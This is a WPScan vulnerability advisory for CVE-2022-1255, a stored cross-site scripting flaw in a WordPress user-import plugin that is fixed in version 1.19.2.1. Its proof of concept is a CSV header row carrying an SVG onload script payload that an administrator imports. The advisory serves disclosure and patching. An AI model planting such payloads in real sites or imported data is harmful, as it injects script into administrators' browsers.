WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Import and export users and customers < 1.19.2.1 - Admin+ Stored Cross-Site Scripting

Description

The plugin does not sanitise and escaped imported CSV data, which could allow high privilege users to import malicious javascript code and lead to Stored Cross-Site Scripting issues

Proof of Concept

As admin, import the below CSV file via Tools > Import and export users and customers (/wp-admin/tools.php?page=acui)

user_login	user_email	display_name	role<svg onload=confirm(/XSS/)//	first_name	last_name	billing_first_name	billing_last_name	billing_company	billing_email	billing_phone	billing_country	billing_address_1	billing_address_2	billing_city	billing_state	billing_postcode	shipping_first_name	shipping_last_name	shipping_company	shipping_country	shipping_address_1	shipping_address_2	shipping_city	shipping_state	shipping_postcode

Then the XSS will be triggered after the import, as well as in the Extra profile fields page of the plugin (/wp-admin/tools.php?page=acui&tab=columns) 

Affects Plugins

import-users-from-csv-with-meta
Fixed in version 1.19.2.1

References

CVE
CVE-2022-1255

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

0x23.so

Submitter

0x23.so

Verified

Yes

WPVDB ID
22fe68c4-8f47-491e-be87-5e8e40535a82

Timeline

Publicly Published

2022-04-11 (about 2 months ago)

Added

2022-04-11 (about 2 months ago)

Last Updated

2022-04-13 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceDisclosure policy
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us